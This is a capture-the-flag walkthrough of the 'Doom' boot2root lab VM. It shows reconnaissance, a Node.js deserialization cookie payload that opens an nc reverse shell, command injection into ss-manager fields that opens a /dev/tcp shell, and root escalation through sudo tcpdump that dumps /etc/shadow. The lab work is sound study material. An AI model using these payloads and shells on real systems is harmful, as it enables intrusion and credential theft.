Found the target at 192.168.1.138..
So now let’s scan it quickly:
root@kali:~# nmap -sC -sV 192.168.1.138
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 20:47 UTC
Nmap scan report for 192.168.1.138
Host is up (0.00026s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:6E:99:04 (Oracle VirtualBox virtual NIC)
Love the 666 port !!!!! Let’s check it:
ok not much…. Need to enumerate more:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –url http://192.168.1.138:666 > directories
more directories
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.138:666
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/10 20:54:17 Starting gobuster
===============================================================
===============================================================
2019/09/10 20:55:12 Finished
===============================================================
And NIKTO:
nikto -url http://192.168.1.138:666
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.138
+ Target Hostname: 192.168.1.138
+ Target Port: 666
+ Start Time: 2019-09-10 20:55:04 (GMT0)
—————————————————————————
+ Server: No banner retrieved
+ Retrieved x-powered-by header: Express
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2019-09-10 20:55:13 (GMT0) (9 seconds)
—————————————————————————
Not really lucky for now….
Searchsploit was not very helpfull so let’s try BURP:
GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/”24-xWt5IUP3GfGbHraPgY5EGPpcNzA”
So let’s see what’s in the cookie… I decoded it (Base 64) with Burp:
{“username”:”Admin”,”csrftoken”:”u32t4o3tb3gg431fs34ggdgchjwnza0l=”,”Expires=”:Friday, 13 Oct 2018 00:00:00 GMTIn0%3D
So now I have a username and a token…
With Burp, I tried to pass just the username value:
GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIn0=
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/”24-xWt5IUP3GfGbHraPgY5EGPpcNzA”
And I have a welcome page:
Let’s try to have a shell. Maybe we can have execute permission:
Creating a payload
{“username”:”_$$ND_FUNC$$_function(){return require(‘child_process’).execSync(‘nc 192.168.1.123 4444 -e /bin/sh’,(e,out,err)=>{console.log(out);}); }()”}
Then Base64 encode
Then on Kali:
nc -nlvp 4444
listening on [any] 4444 …
Then in Burp:
GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ25jIDE5Mi4xNjguMS4xMjMgNDQ0NCAtZSAvYmluL3NoJywoZSxvdXQsZXJyKT0+e2NvbnNvbGUubG9nKG91dCk7fSk7IH0oKSJ9
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/”24-xWt5IUP3GfGbHraPgY5EGPpcNzA”
Bingo a shell!
connect to [192.168.1.123] from (UNKNOWN) [192.168.1.138] 47718
id
uid=1001(nodeadmin) gid=1001(nodeadmin) groups=1001(nodeadmin)
So as usual, let’s upgrade:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
[nodeadmin@localhost ~]$
CTRL Z
stty raw -echo
fg and two times ENTER
export TERM=screen
reset
Then trying sudo -l in case of…
[nodeadmin@localhost ~]$ ll /usr/bin/sudo -l
—s–x–x. 1 root root 158608 Feb 9 2018 /usr/bin/sudo
So I uploaded linenum:
on Kali:
root@kali:~/tools# python -m SimpleHTTPServer 9000
Serving HTTP on 0.0.0.0 port 9000 …
On the target:
wget http://192.168.1.123:9000/linenum.sh
wget http://192.168.1.123:9000/linenum.sh
–2019-09-12 13:24:23– http://192.168.1.123:9000/linenum.sh
Connecting to 192.168.1.123:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: ‘linenum.sh’
linenum.sh 100%[===================>] 44.58K –.-KB/s in 0s
2019-09-12 13:24:23 (410 MB/s) – ‘linenum.sh’ saved [45652/45652]
[nodeadmin@localhost ~]$ ll
ll
total 88
drwx——. 5 nodeadmin nodeadmin 4096 Sep 12 13:24 .
drwxr-xr-x. 4 root root 4096 Jun 2 2018 ..
-rw——-. 1 nodeadmin nodeadmin 1 Jun 7 2018 .bash_history
-rw-r–r–. 1 nodeadmin nodeadmin 18 Mar 15 2018 .bash_logout
-rw-r–r–. 1 nodeadmin nodeadmin 193 Mar 15 2018 .bash_profile
-rw-r–r–. 1 nodeadmin nodeadmin 231 Mar 15 2018 .bashrc
drwx—— 3 nodeadmin nodeadmin 4096 Jun 1 2018 .config
-rw——- 1 nodeadmin nodeadmin 16 Jun 3 2018 .esd_auth
drwxr-xr-x 4 nodeadmin nodeadmin 4096 Jun 3 2018 .forever
-rw-rw-r– 1 nodeadmin nodeadmin 45652 Jul 16 12:58 linenum.sh
drwxrwxr-x. 3 nodeadmin nodeadmin 4096 May 30 2018 .web
[nodeadmin@localhost ~]$ chmod +x linenum.sh
chmod +x linenum.sh
[nodeadmin@localhost ~]$ ./linenum.sh -t > enum
[-] Kernel information:
Linux localhost.localdomain 4.16.3-301.fc28.x86_64 #1 SMP Mon Apr 23 21:59:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[-] Specific release information:
Fedora release 28 (Twenty Eight)
NAME=Fedora
VERSION=”28 (Workstation Edition)”
ID=fedora
VERSION_ID=28
PLATFORM_ID=”platform:f28″
PRETTY_NAME=”Fedora 28 (Workstation Edition)”
### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r–r–. 1 root root 0 Feb 7 2018 /etc/cron.deny
-rw-r–r–. 1 root root 451 Feb 7 2018 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x. 2 root root 4096 Apr 25 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rw-r–r–. 1 root root 128 Feb 7 2018 0hourly
-rw-r–r–. 1 root root 108 Aug 3 2017 raid-check
/etc/cron.daily:
total 28
drwxr-xr-x. 2 root root 4096 Jun 7 2018 .
–More–(72%)
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rwxr-xr-x. 1 root root 2239 Feb 7 2018 certwatch
-rwxr-xr-x 1 root root 232 Apr 19 2018 exim-tidydb
-rwxr-xr-x. 1 root root 189 Jan 4 2018 logrotate
/etc/cron.hourly:
total 20
drwxr-xr-x. 2 root root 4096 Apr 25 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rwxr-xr-x. 1 root root 575 Feb 7 2018 0anacron
### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/nc
/usr/bin/wget
/usr/bin/curl
[-] SUID files:
-rws–x–x. 1 root root 41496 Feb 23 2018 /usr/sbin/userhelper
-rwsr-xr-x. 1 root root 11720 Feb 8 2018 /usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 28280 Aug 27 2017 /usr/sbin/mtr-packet
-rwsr-xr-x. 1 root root 11768 Feb 9 2018 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 1408432 Apr 19 2018 /usr/sbin/exim
-rwsr-xr-x. 1 root root 123944 Apr 11 2018 /usr/sbin/mount.nfs
-rwsr-xr-x. 1 root root 38080 Feb 8 2018 /usr/sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 20224 Mar 21 2018 /usr/libexec/gstreamer-1.0/gst-ptp-helper
-rwsr-xr-x. 1 root root 11952 Apr 12 2018 /usr/libexec/Xorg.wrap
-rwsr-sr-x. 1 abrt abrt 15856 Mar 27 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwsr-x—. 1 root dbus 57960 Oct 30 2017 /usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root 44160 Feb 6 2018 /usr/bin/newgidmap
-rwsr-xr-x. 1 root root 32848 Feb 7 2018 /usr/bin/fusermount
-rws–x–x. 1 root root 25936 Mar 27 2018 /usr/bin/chsh
-rwsr-xr-x. 1 root root 59752 Feb 7 2018 /usr/bin/crontab
-rwsr-xr-x. 1 root root 50304 Mar 27 2018 /usr/bin/mount
-rwsr-xr-x. 1 root root 55440 Feb 25 2018 /usr/bin/at
-rwsr-xr-x. 1 root root 46328 Mar 27 2018 /usr/bin/su
-rwsr-xr-x. 1 root root 33136 Mar 27 2018 /usr/bin/umount
-rwsr-xr-x. 1 root root 44168 Feb 6 2018 /usr/bin/newuidmap
-rwsr-xr-x. 1 root root 28168 Apr 4 2018 /usr/bin/pkexec
-rws–x–x. 1 root root 30536 Mar 27 2018 /usr/bin/chfn
-rwsr-xr-x. 1 root root 89296 Feb 6 2018 /usr/bin/gpasswd
—s–x–x. 1 root root 158608 Feb 9 2018 /usr/bin/sudo
-rwsr-xr-x. 1 root root 29008 Apr 12 2018 /usr/bin/passwd
-rwsr-xr-x. 1 root root 82040 Feb 6 2018 /usr/bin/chage
-rwsr-xr-x. 1 root root 49432 Feb 6 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 10480 Jun 1 2018 /usr/local/lib/authbind/helper
-rwsr-xr-x. 1 root root 16304 Apr 4 2018 /usr/lib/polkit-1/polkit-agent-helper-1
[+] Possibly interesting SUID files:
-rwsr-xr-x. 1 root root 28280 Aug 27 2017 /usr/sbin/mtr-packet
[-] SGID files:
-rwxr-sr-x. 1 root root 7608 Feb 9 2018 /usr/sbin/netreport
-rwx–s–x. 1 root lock 16024 Apr 12 2018 /usr/sbin/lockdev
-rwx–s–x. 1 root utmp 11704 Feb 26 2018 /usr/libexec/utempter/utempter
-r-xr-sr-x. 1 root ssh_keys 468032 Apr 12 2018 /usr/libexec/openssh/ssh-keysign
-rwsr-sr-x. 1 abrt abrt 15856 Mar 27 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwxr-sr-x. 1 root tty 20408 Mar 27 2018 /usr/bin/write
-rwx–s–x. 1 root slocate 45064 Feb 9 2018 /usr/bin/locate
Nothing really juiciy…. However I noticed that Pulse audio is running…
searchsploit has an exploit for it:
PulseAudio setuid – Local Privilege Escalation | exploits/linux/local/9207.sh
However gcc is not on the target so I modified the exploit to cmpile it on my 64bits machines:
gcc -m32 -o $workdir/pa_race $workdir/pa_race.c
gcc -m32 -o $workdir/sh $workdir/sh.c
#$workdir/pa_race
Then change dir to /tmp and started an http server:
python -m SimpleHTTPServer 9000
Then on the target:
nodeadmin@localhost ~]$ wget http://192.168.0.11:9000/sh
–2019-09-16 10:37:03– http://192.168.0.11:9000/sh
Connecting to 192.168.0.11:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 15604 (15K) [application/octet-stream]
Saving to: ‘sh’
sh 100%[===================>] 15.24K –.-KB/s in 0s
2019-09-16 10:37:03 (178 MB/s) – ‘sh’ saved [15604/15604]
[nodeadmin@localhost ~]$ wget http://192.168.0.11:9000/pa_race
–2019-09-16 10:37:09– http://192.168.0.11:9000/pa_race
Connecting to 192.168.0.11:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 15896 (16K) [application/octet-stream]
Saving to: ‘pa_race’
pa_race 100%[===================>] 15.52K –.-KB/s in 0s
2019-09-16 10:37:09 (250 MB/s) – ‘pa_race’ saved [15896/15896]
Then:
[nodeadmin@localhost ~]$ chmod +x sh
[nodeadmin@localhost ~]$ chmod +x pa_race
[nodeadmin@localhost ~]$ ./pa_race
link: Invalid cross-device link
CRAP!
Ok, if I do a ps-ax, I see that ss-manager is running as fireman..
Let’s try this:
nc -u 127.0.0.1 8839
add: {“server_port”:8003, “password”:”test”, “method”:”||chmod -R 777 /home/fireman||”}
ok^C
[nodeadmin@localhost home]$ ll
total 8
drwxrwxrwx 6 fireman fireman 4096 Jun 7 2018 fireman
drwx——. 6 nodeadmin nodeadmin 4096 Sep 16 10:49 nodeadmin
[nodeadmin@localhost home]$ cd fireman
[nodeadmin@localhost fireman]$ ll
total 0
Ok nothing in Fireman’s home….
So let’s have a shell with fireman…. I saw in his history that he can do sudo -l
nc -u 127.0.0.1 8839
add: {“server_port”:8003, “password”:”test”, “method”:”||bash -i >& /dev/tcp/192.168.0.11/8080 0>&1||”}
On Kali: nc -lnvp 8080
root@kali:~/boxes/doom# nc -nvlp 8080
listening on [any] 8080 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.16] 42730
bash: cannot set terminal process group (842): Inappropriate ioctl for device
bash: no job control in this shell
[fireman@localhost root]$ id
id
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
[fireman@localhost root]$
Interesting!
[fireman@localhost root]$ sudo -l
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep=”COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS”, env_keep+=”MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE”, env_keep+=”LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES”, env_keep+=”LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE”, env_keep+=”LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY”,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump
Ok so lt’s use tcpdump to execute commands:
echo $’id\ncat /etc/shadow’ > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -G 1 -z /tmp/.test -Z root
root:$6$jA85omnRVznNFM4j$voN29bYWJUlRbxgsqia46oC9IK/mdRK5B.IYUrJYs196sfA3ye3rSV790EoD76ABKu29CdtnAXQtIAo6OpNWc1:17681:0:99999:7:::
So let’s try a reverse shell:
I create /tmp/root with:
nc -e /bin/sh 192.168.0.16 8090
Then nc -nvlp 8090 on the localhost
and in my fireman shell:
sudo tcpdump -ln -i eth0 -w /dev/null -G 1 -z /tmp/root -Z root
whoami
root
cat flag.txt
[+] You’re a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.
+—————————————————————————–+
| | |\ -~ / \ / |
|~~__ | \ | \/ /\ /|
| — | \ | / \ / \ / |
| |~_| \ \___|/ \/ / |
|–__ | — |\________________________________/~~\~~| / \ / \ |
| |~~–__ |~_|____|____|____|____|____|____|/ / \/|\ / \/ \/|
| | |~–_|__|____|____|____|____|____|_/ /| |/ \ / \ / |
|___|______|__|_||____|____|____|____|____|__[]/_|—-| \/ \ / |
| \mmmm : | _|___|____|____|____|____|____|___| /\| / \ / \ |
| B :_–~~ |_|____|____|____|____|____|____| | |\/ \ / \ |
| __–P : | / / / | \ / \ /\|
|~~ | : | / ~~~ | \ / \ / |
| | |/ .-. | /\ \ / |
| | / | | |/ \ /\ |
| | / | | -_ \ / \ |
+—————————————————————————–+
| | /| | | 2 3 4 | /~~~~~\ | /| |_| …. ……… |
| | ~|~ | % | | | ~J~ | | ~|~ % |_| …. ……… |
| AMMO | HEALTH | 5 6 7 | \===/ | ARMOR |#| …. ……… |
+—————————————————————————–+
FLAG: kre0cu4jl4rzjicpo1i7z5l1
[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.
[+] You can follow me on twitter: @0katz
[+] Thanks to the homie: @Pink_P4nther